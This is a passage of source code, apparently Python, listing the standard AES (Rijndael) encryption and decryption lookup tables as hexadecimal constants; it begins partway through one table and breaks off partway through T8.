0xd36bb8b8, 0x3c281414, 0x79a7dede, 0xe2bc5e5e, 0x1d160b0b, 0x76addbdb, 0x3bdbe0e0, 0x56643232, 0x4e743a3a, 0x1e140a0a, 0xdb924949, 0x0a0c0606, 0x6c482424, 0xe4b85c5c, 0x5d9fc2c2, 0x6ebdd3d3, 0xef43acac, 0xa6c46262, 0xa8399191, 0xa4319595, 0x37d3e4e4, 0x8bf27979, 0x32d5e7e7, 0x438bc8c8, 0x596e3737, 0xb7da6d6d, 0x8c018d8d, 0x64b1d5d5, 0xd29c4e4e, 0xe049a9a9, 0xb4d86c6c, 0xfaac5656, 0x07f3f4f4, 0x25cfeaea, 0xafca6565, 0x8ef47a7a, 0xe947aeae, 0x18100808, 0xd56fbaba, 0x88f07878, 0x6f4a2525, 0x725c2e2e, 0x24381c1c, 0xf157a6a6, 0xc773b4b4, 0x5197c6c6, 0x23cbe8e8, 0x7ca1dddd, 0x9ce87474, 0x213e1f1f, 0xdd964b4b, 0xdc61bdbd, 0x860d8b8b, 0x850f8a8a, 0x90e07070, 0x427c3e3e, 0xc471b5b5, 0xaacc6666, 0xd8904848, 0x05060303, 0x01f7f6f6, 0x121c0e0e, 0xa3c26161, 0x5f6a3535, 0xf9ae5757, 0xd069b9b9, 0x91178686, 0x5899c1c1, 0x273a1d1d, 0xb9279e9e, 0x38d9e1e1, 0x13ebf8f8, 0xb32b9898, 0x33221111, 0xbbd26969, 0x70a9d9d9, 0x89078e8e, 0xa7339494, 0xb62d9b9b, 0x223c1e1e, 0x92158787, 0x20c9e9e9, 0x4987cece, 0xffaa5555, 0x78502828, 0x7aa5dfdf, 0x8f038c8c, 0xf859a1a1, 0x80098989, 0x171a0d0d, 0xda65bfbf, 0x31d7e6e6, 0xc6844242, 0xb8d06868, 0xc3824141, 0xb0299999, 0x775a2d2d, 0x111e0f0f, 0xcb7bb0b0, 0xfca85454, 0xd66dbbbb, 0x3a2c1616]
T3 = [0x63a5c663, 0x7c84f87c, 0x7799ee77, 0x7b8df67b, 0xf20dfff2, 0x6bbdd66b, 0x6fb1de6f, 0xc55491c5, 0x30506030, 0x01030201, 0x67a9ce67, 0x2b7d562b, 0xfe19e7fe, 0xd762b5d7, 0xabe64dab, 0x769aec76, 0xca458fca, 0x829d1f82, 0xc94089c9, 0x7d87fa7d, 0xfa15effa, 0x59ebb259, 0x47c98e47, 0xf00bfbf0, 0xadec41ad, 0xd467b3d4, 0xa2fd5fa2, 0xafea45af, 0x9cbf239c, 0xa4f753a4, 0x7296e472, 0xc05b9bc0, 0xb7c275b7, 0xfd1ce1fd, 0x93ae3d93, 0x266a4c26, 0x365a6c36, 0x3f417e3f, 0xf702f5f7, 0xcc4f83cc, 0x345c6834, 0xa5f451a5, 0xe534d1e5, 0xf108f9f1, 0x7193e271, 0xd873abd8, 0x31536231, 0x153f2a15, 0x040c0804, 0xc75295c7, 0x23654623, 0xc35e9dc3, 0x18283018, 0x96a13796, 0x050f0a05, 0x9ab52f9a, 0x07090e07, 0x12362412, 0x809b1b80, 0xe23ddfe2, 0xeb26cdeb, 0x27694e27, 0xb2cd7fb2, 0x759fea75, 0x091b1209, 0x839e1d83, 0x2c74582c, 0x1a2e341a, 0x1b2d361b, 0x6eb2dc6e, 0x5aeeb45a, 0xa0fb5ba0, 0x52f6a452, 0x3b4d763b, 0xd661b7d6, 0xb3ce7db3, 0x297b5229, 0xe33edde3, 0x2f715e2f, 0x84971384, 0x53f5a653, 0xd168b9d1, 0x00000000, 0xed2cc1ed, 0x20604020, 0xfc1fe3fc, 0xb1c879b1, 0x5bedb65b, 0x6abed46a, 0xcb468dcb, 0xbed967be, 0x394b7239, 0x4ade944a, 0x4cd4984c, 0x58e8b058, 0xcf4a85cf, 0xd06bbbd0, 0xef2ac5ef, 0xaae54faa, 0xfb16edfb, 0x43c58643, 0x4dd79a4d, 0x33556633, 0x85941185, 0x45cf8a45, 0xf910e9f9, 0x02060402, 0x7f81fe7f, 0x50f0a050, 0x3c44783c, 0x9fba259f, 0xa8e34ba8, 0x51f3a251, 0xa3fe5da3, 0x40c08040, 0x8f8a058f, 0x92ad3f92, 0x9dbc219d, 0x38487038, 0xf504f1f5, 0xbcdf63bc, 0xb6c177b6, 0xda75afda, 0x21634221, 0x10302010, 0xff1ae5ff, 0xf30efdf3, 0xd26dbfd2, 0xcd4c81cd, 0x0c14180c, 0x13352613, 0xec2fc3ec, 0x5fe1be5f, 0x97a23597, 0x44cc8844, 0x17392e17, 0xc45793c4, 0xa7f255a7, 0x7e82fc7e, 0x3d477a3d, 0x64acc864, 0x5de7ba5d, 0x192b3219, 0x7395e673, 0x60a0c060, 0x81981981, 0x4fd19e4f, 0xdc7fa3dc, 0x22664422, 0x2a7e542a, 0x90ab3b90, 0x88830b88, 0x46ca8c46, 0xee29c7ee, 0xb8d36bb8, 0x143c2814, 0xde79a7de, 0x5ee2bc5e, 0x0b1d160b, 0xdb76addb, 0xe03bdbe0, 0x32566432, 0x3a4e743a, 0x0a1e140a, 0x49db9249, 0x060a0c06, 0x246c4824, 0x5ce4b85c, 0xc25d9fc2, 0xd36ebdd3, 0xacef43ac, 0x62a6c462, 0x91a83991, 0x95a43195, 0xe437d3e4, 0x798bf279, 0xe732d5e7, 0xc8438bc8, 0x37596e37, 0x6db7da6d, 0x8d8c018d, 0xd564b1d5, 0x4ed29c4e, 0xa9e049a9, 0x6cb4d86c, 0x56faac56, 0xf407f3f4, 0xea25cfea, 0x65afca65, 0x7a8ef47a, 0xaee947ae, 0x08181008, 0xbad56fba, 0x7888f078, 0x256f4a25, 0x2e725c2e, 0x1c24381c, 0xa6f157a6, 0xb4c773b4, 0xc65197c6, 0xe823cbe8, 0xdd7ca1dd, 0x749ce874, 0x1f213e1f, 0x4bdd964b, 0xbddc61bd, 0x8b860d8b, 0x8a850f8a, 0x7090e070, 0x3e427c3e, 0xb5c471b5, 0x66aacc66, 0x48d89048, 0x03050603, 0xf601f7f6, 0x0e121c0e, 0x61a3c261, 0x355f6a35, 0x57f9ae57, 0xb9d069b9, 0x86911786, 0xc15899c1, 0x1d273a1d, 0x9eb9279e, 0xe138d9e1, 0xf813ebf8, 0x98b32b98, 0x11332211, 0x69bbd269, 0xd970a9d9, 0x8e89078e, 0x94a73394, 0x9bb62d9b, 0x1e223c1e, 0x87921587, 0xe920c9e9, 0xce4987ce, 0x55ffaa55, 0x28785028, 0xdf7aa5df, 0x8c8f038c, 0xa1f859a1, 0x89800989, 0x0d171a0d, 0xbfda65bf, 0xe631d7e6, 0x42c68442, 0x68b8d068, 0x41c38241, 0x99b02999, 0x2d775a2d, 0x0f111e0f, 0xb0cb7bb0, 0x54fca854, 0xbbd66dbb, 0x163a2c16]
T4 = [0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x01010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x04040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x05050f0a, 0x9a9ab52f, 0x0707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x09091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x00000000, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x02020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0x0c0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0x0b0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0x0a0a1e14, 0x4949db92, 0x06060a0c, 0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x08081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x03030506, 0xf6f601f7, 0x0e0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 0x89898009, 0x0d0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0x0f0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c]
# Transformations for decryption
T5 = [0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96, 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393, 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25, 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f, 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1, 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6, 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da, 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844, 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd, 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4, 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45, 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94, 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7, 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a, 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5, 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c, 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1, 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a, 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75, 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051, 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46, 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff, 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77, 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb, 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000, 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e, 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927, 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a, 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e, 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16, 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d, 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8, 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd, 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34, 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163, 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120, 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d, 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0, 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422, 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef, 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36, 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4, 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662, 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5, 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3, 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b, 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8, 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6, 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6, 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0, 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815, 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f, 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df, 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f, 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e, 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713, 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89, 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c, 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf, 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86, 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f, 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541, 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190, 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742]
T6 = [0x5051f4a7, 0x537e4165, 0xc31a17a4, 0x963a275e, 0xcb3bab6b, 0xf11f9d45, 0xabacfa58, 0x934be303, 0x552030fa, 0xf6ad766d, 0x9188cc76, 0x25f5024c, 0xfc4fe5d7, 0xd7c52acb, 0x80263544, 0x8fb562a3, 0x49deb15a, 0x6725ba1b, 0x9845ea0e, 0xe15dfec0, 0x02c32f75, 0x12814cf0, 0xa38d4697, 0xc66bd3f9, 0xe7038f5f, 0x9515929c, 0xebbf6d7a, 0xda955259, 0x2dd4be83, 0xd3587421, 0x2949e069, 0x448ec9c8, 0x6a75c289, 0x78f48e79, 0x6b99583e, 0xdd27b971, 0xb6bee14f, 0x17f088ad, 0x66c920ac, 0xb47dce3a, 0x1863df4a, 0x82e51a31, 0x60975133, 0x4562537f, 0xe0b16477, 0x84bb6bae, 0x1cfe81a0, 0x94f9082b, 0x58704868, 0x198f45fd, 0x8794de6c, 0xb7527bf8, 0x23ab73d3, 0xe2724b02, 0x57e31f8f, 0x2a6655ab, 0x07b2eb28, 0x032fb5c2, 0x9a86c57b, 0xa5d33708, 0xf2302887, 0xb223bfa5, 0xba02036a, 0x5ced1682, 0x2b8acf1c, 0x92a779b4, 0xf0f307f2, 0xa14e69e2, 0xcd65daf4, 0xd50605be, 0x1fd13462, 0x8ac4a6fe, 0x9d342e53, 0xa0a2f355, 0x32058ae1, 0x75a4f6eb, 0x390b83ec, 0xaa4060ef, 0x065e719f, 0x51bd6e10, 0xf93e218a, 0x3d96dd06, 0xaedd3e05, 0x464de6bd, 0xb591548d, 0x0571c45d, 0x6f0406d4, 0xff605015, 0x241998fb, 0x97d6bde9, 0xcc894043, 0x7767d99e, 0xbdb0e842, 0x8807898b, 0x38e7195b, 0xdb79c8ee, 0x47a17c0a, 0xe97c420f, 0xc9f8841e, 0x00000000, 0x83098086, 0x48322bed, 0xac1e1170, 0x4e6c5a72, 0xfbfd0eff, 0x560f8538, 0x1e3daed5, 0x27362d39, 0x640a0fd9, 0x21685ca6, 0xd19b5b54, 0x3a24362e, 0xb10c0a67, 0x0f9357e7, 0xd2b4ee96, 0x9e1b9b91, 0x4f80c0c5, 0xa261dc20, 0x695a774b, 0x161c121a, 0x0ae293ba, 0xe5c0a02a, 0x433c22e0, 0x1d121b17, 0x0b0e090d, 0xadf28bc7, 0xb92db6a8, 0xc8141ea9, 0x8557f119, 0x4caf7507, 0xbbee99dd, 0xfda37f60, 0x9ff70126, 0xbc5c72f5, 0xc544663b, 0x345bfb7e, 0x768b4329, 0xdccb23c6, 0x68b6edfc, 0x63b8e4f1, 0xcad731dc, 0x10426385, 0x40139722, 0x2084c611, 0x7d854a24, 0xf8d2bb3d, 0x11aef932, 0x6dc729a1, 0x4b1d9e2f, 0xf3dcb230, 0xec0d8652, 0xd077c1e3, 0x6c2bb316, 0x99a970b9, 0xfa119448, 0x2247e964, 0xc4a8fc8c, 0x1aa0f03f, 0xd8567d2c, 0xef223390, 0xc787494e, 0xc1d938d1, 0xfe8ccaa2, 0x3698d40b, 0xcfa6f581, 0x28a57ade, 0x26dab78e, 0xa43fadbf, 0xe42c3a9d, 0x0d507892, 0x9b6a5fcc, 0x62547e46, 0xc2f68d13, 0xe890d8b8, 0x5e2e39f7, 0xf582c3af, 0xbe9f5d80, 0x7c69d093, 0xa96fd52d, 0xb3cf2512, 0x3bc8ac99, 0xa710187d, 0x6ee89c63, 0x7bdb3bbb, 0x09cd2678, 0xf46e5918, 0x01ec9ab7, 0xa8834f9a, 0x65e6956e, 0x7eaaffe6, 0x0821bccf, 0xe6ef15e8, 0xd9bae79b, 0xce4a6f36, 0xd4ea9f09, 0xd629b07c, 0xaf31a4b2, 0x312a3f23, 0x30c6a594, 0xc035a266, 0x37744ebc, 0xa6fc82ca, 0xb0e090d0, 0x1533a7d8, 0x4af10498, 0xf741ecda, 0x0e7fcd50, 0x2f1791f6, 0x8d764dd6, 0x4d43efb0, 0x54ccaa4d, 0xdfe49604, 0xe39ed1b5, 0x1b4c6a88, 0xb8c12c1f, 0x7f466551, 0x049d5eea, 0x5d018c35, 0x73fa8774, 0x2efb0b41, 0x5ab3671d, 0x5292dbd2, 0x33e91056, 0x136dd647, 0x8c9ad761, 0x7a37a10c, 0x8e59f814, 0x89eb133c, 0xeecea927, 0x35b761c9, 0xede11ce5, 0x3c7a47b1, 0x599cd2df, 0x3f55f273, 0x791814ce, 0xbf73c737, 0xea53f7cd, 0x5b5ffdaa, 0x14df3d6f, 0x867844db, 0x81caaff3, 0x3eb968c4, 0x2c382434, 0x5fc2a340, 0x72161dc3, 0x0cbce225, 0x8b283c49, 0x41ff0d95, 0x7139a801, 0xde080cb3, 0x9cd8b4e4, 0x906456c1, 0x617bcb84, 0x70d532b6, 0x74486c5c, 0x42d0b857]
T7 = [0xa75051f4, 0x65537e41, 0xa4c31a17, 0x5e963a27, 0x6bcb3bab, 0x45f11f9d, 0x58abacfa, 0x03934be3, 0xfa552030, 0x6df6ad76, 0x769188cc, 0x4c25f502, 0xd7fc4fe5, 0xcbd7c52a, 0x44802635, 0xa38fb562, 0x5a49deb1, 0x1b6725ba, 0x0e9845ea, 0xc0e15dfe, 0x7502c32f, 0xf012814c, 0x97a38d46, 0xf9c66bd3, 0x5fe7038f, 0x9c951592, 0x7aebbf6d, 0x59da9552, 0x832dd4be, 0x21d35874, 0x692949e0, 0xc8448ec9, 0x896a75c2, 0x7978f48e, 0x3e6b9958, 0x71dd27b9, 0x4fb6bee1, 0xad17f088, 0xac66c920, 0x3ab47dce, 0x4a1863df, 0x3182e51a, 0x33609751, 0x7f456253, 0x77e0b164, 0xae84bb6b, 0xa01cfe81, 0x2b94f908, 0x68587048, 0xfd198f45, 0x6c8794de, 0xf8b7527b, 0xd323ab73, 0x02e2724b, 0x8f57e31f, 0xab2a6655, 0x2807b2eb, 0xc2032fb5, 0x7b9a86c5, 0x08a5d337, 0x87f23028, 0xa5b223bf, 0x6aba0203, 0x825ced16, 0x1c2b8acf, 0xb492a779, 0xf2f0f307, 0xe2a14e69, 0xf4cd65da, 0xbed50605, 0x621fd134, 0xfe8ac4a6, 0x539d342e, 0x55a0a2f3, 0xe132058a, 0xeb75a4f6, 0xec390b83, 0xefaa4060, 0x9f065e71, 0x1051bd6e, 0x8af93e21, 0x063d96dd, 0x05aedd3e, 0xbd464de6, 0x8db59154, 0x5d0571c4, 0xd46f0406, 0x15ff6050, 0xfb241998, 0xe997d6bd, 0x43cc8940, 0x9e7767d9, 0x42bdb0e8, 0x8b880789, 0x5b38e719, 0xeedb79c8, 0x0a47a17c, 0x0fe97c42, 0x1ec9f884, 0x00000000, 0x86830980, 0xed48322b, 0x70ac1e11, 0x724e6c5a, 0xfffbfd0e, 0x38560f85, 0xd51e3dae, 0x3927362d, 0xd9640a0f, 0xa621685c, 0x54d19b5b, 0x2e3a2436, 0x67b10c0a, 0xe70f9357, 0x96d2b4ee, 0x919e1b9b, 0xc54f80c0, 0x20a261dc, 0x4b695a77, 0x1a161c12, 0xba0ae293, 0x2ae5c0a0, 0xe0433c22, 0x171d121b, 0x0d0b0e09, 0xc7adf28b, 0xa8b92db6, 0xa9c8141e, 0x198557f1, 0x074caf75, 0xddbbee99, 0x60fda37f, 0x269ff701, 0xf5bc5c72, 0x3bc54466, 0x7e345bfb, 0x29768b43, 0xc6dccb23, 0xfc68b6ed, 0xf163b8e4, 0xdccad731, 0x85104263, 0x22401397, 0x112084c6, 0x247d854a, 0x3df8d2bb, 0x3211aef9, 0xa16dc729, 0x2f4b1d9e, 0x30f3dcb2, 0x52ec0d86, 0xe3d077c1, 0x166c2bb3, 0xb999a970, 0x48fa1194, 0x642247e9, 0x8cc4a8fc, 0x3f1aa0f0, 0x2cd8567d, 0x90ef2233, 0x4ec78749, 0xd1c1d938, 0xa2fe8cca, 0x0b3698d4, 0x81cfa6f5, 0xde28a57a, 0x8e26dab7, 0xbfa43fad, 0x9de42c3a, 0x920d5078, 0xcc9b6a5f, 0x4662547e, 0x13c2f68d, 0xb8e890d8, 0xf75e2e39, 0xaff582c3, 0x80be9f5d, 0x937c69d0, 0x2da96fd5, 0x12b3cf25, 0x993bc8ac, 0x7da71018, 0x636ee89c, 0xbb7bdb3b, 0x7809cd26, 0x18f46e59, 0xb701ec9a, 0x9aa8834f, 0x6e65e695, 0xe67eaaff, 0xcf0821bc, 0xe8e6ef15, 0x9bd9bae7, 0x36ce4a6f, 0x09d4ea9f, 0x7cd629b0, 0xb2af31a4, 0x23312a3f, 0x9430c6a5, 0x66c035a2, 0xbc37744e, 0xcaa6fc82, 0xd0b0e090, 0xd81533a7, 0x984af104, 0xdaf741ec, 0x500e7fcd, 0xf62f1791, 0xd68d764d, 0xb04d43ef, 0x4d54ccaa, 0x04dfe496, 0xb5e39ed1, 0x881b4c6a, 0x1fb8c12c, 0x517f4665, 0xea049d5e, 0x355d018c, 0x7473fa87, 0x412efb0b, 0x1d5ab367, 0xd25292db, 0x5633e910, 0x47136dd6, 0x618c9ad7, 0x0c7a37a1, 0x148e59f8, 0x3c89eb13, 0x27eecea9, 0xc935b761, 0xe5ede11c, 0xb13c7a47, 0xdf599cd2, 0x733f55f2, 0xce791814, 0x37bf73c7, 0xcdea53f7, 0xaa5b5ffd, 0x6f14df3d, 0xdb867844, 0xf381caaf, 0xc43eb968, 0x342c3824, 0x405fc2a3, 0xc372161d, 0x250cbce2, 0x498b283c, 0x9541ff0d, 0x017139a8, 0xb3de080c, 0xe49cd8b4, 0xc1906456, 0x84617bcb, 0xb670d532, 0x5c74486c, 0x5742d0b8]
T8 = [0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x024c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x082b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x036aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x07f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x05bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x06d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x00000000, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0x0efffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0x0fd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0x0a67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x090d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x01269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 